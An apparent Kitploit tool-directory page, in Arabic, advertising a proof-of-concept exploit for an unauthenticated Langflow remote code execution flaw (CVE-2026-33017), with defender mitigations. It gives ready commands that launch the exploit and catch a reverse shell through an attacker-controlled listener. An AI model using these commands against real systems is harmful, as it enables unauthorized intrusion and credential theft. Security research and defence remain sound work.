Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33017-Langflop — CVE-2026-33017 Langflow RCE PoC | Kitploit
أدوات/GitHubGitHub/tatosec/cve-2026-33017-langflop
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubtatosec/cve-2026-33017-langflop

CVE-2026-33017-Langflop

CVE-2026-33017 Langflow RCE PoC

عرض المستودع
منذ 15 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33017 Langflow ("Langflop") إثبات مفهوم (PoC) لثغرة RCE دون مصادقة

إثبات مفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية دون مصادقة عبر build_public_tmp في Langflow. يقوم برفع مكوّن خبيث إلى تدفّق عام، ويشغّل البناء، ويلتقط قشرة عكسية.

لأغراض اختبار الأمان المصرَّح به فقط. استخدمه فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

المتطلبات

  • Python 3
  • requests (pip install requests)

الاستخدام

شغّل المستمع المدمج وأطلِق الاستغلال دفعة واحدة:

root@kitploit:~
python3 poc.py \
  --url https://target:7860 \
  --flow-id <public-flow-uuid> \
  --lhost <your-ip> \
  --lport 4444 \
  --listen

عندما تتصل القشرة، تحاول تلقائيًا الترقية إلى قشرة تفاعلية بالكامل.

إذا كنت تفضّل استخدام مستمع خاص بك (مثل nc -lvnp 4444)، فاحذف --listen:

root@kitploit:~
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444

الخيارات

معلومات

CVE-2026-33017 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) دون مصادقة في نقطة النهاية POST /api/v1/build_public_tmp/{flow_id}/flow الخاصة بـ Langflow، والتي تنفّذ كود Python المقدَّم من المهاجم من تعريفات عقد التدفق دون عزل (sandboxing). لمعرفة المزيد، اطّلع على الموارد أدناه:

  • تقرير أبحاث التهديدات الصادر عن Sysdig: CVE-2026-33017: كيف اخترق المهاجمون خطوط أنابيب Langflow للذكاء الاصطناعي خلال 20 ساعة
  • NVD: CVE-2026-33017

التوصيات (للمدافعين)

إجراءات التخفيف من تقرير أبحاث التهديدات الصادر عن Sysdig:

  • حدّث Langflow فورًا. إذا لم تكن النسخة المصحّحة متاحة بعد، فقيّد الوصول الشبكي إلى نقطة النهاية /api/v1/build_public_tmp أو عطّل بناء التدفقات العامة بالكامل.
  • راجع متغيرات البيئة والأسرار على أي مثيل Langflow مكشوف للعموم. قم بتدوير مفاتيح API وكلمات مرور قواعد البيانات وبيانات اعتماد السحابة كإجراء احترازي.
  • راقب الاتصالات الصادرة إلى منافذ غير معتادة أو خدمات استدعاء معروفة (oastify.com, interact.sh, dnslog.cn)، فهي تشير إلى استغلال نشط وسرقة بيانات.
  • قيّد الوصول الشبكي إلى مثيلات Langflow باستخدام قواعد جدار الحماية أو وكيل عكسي مع مصادقة. !!لا ينبغي تعريض Langflow مباشرة للإنترنت دون طبقة مصادقة!!
  • حصر أدوات الذكاء الاصطناعي/التعلم الآلي في بيئتك. المنصات مثل Langflow وn8n وغيرها من أدوات أتمتة سير العمل أصبحت أهدافًا متزايدة لأنها غالبًا تعمل بصلاحيات وصول واسعة إلى API وتُنشر خارج عمليات مراجعة الأمان القياسية.

إخلاء مسؤولية

تُوفَّر هذه الأداة لأغراض البحث واختبار الاختراق المصرَّح به. لا يتحمّل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار.

تنزيل الأداة
الخيارالوصف
--urlعنوان خادم Langflow المستهدف (مطلوب)
--flow-idUUID للتدفق العام المشترك (مطلوب)
--lhostعنوان IP لاستدعاء القشرة العكسية (مطلوب)
--lportمنفذ استدعاء القشرة العكسية (مطلوب)
--listenتشغيل المستمع المدمج
--timeoutمهلة طلب HTTP بالثواني (الافتراضي 30)
-k, --insecureتعطيل التحقق من شهادة TLS (الشهادات ذاتية التوقيع / منتهية الصلاحية)
--no-upgradeتخطّي ترقية TTY التلقائية، واستخدام قشرة أسطر أساسية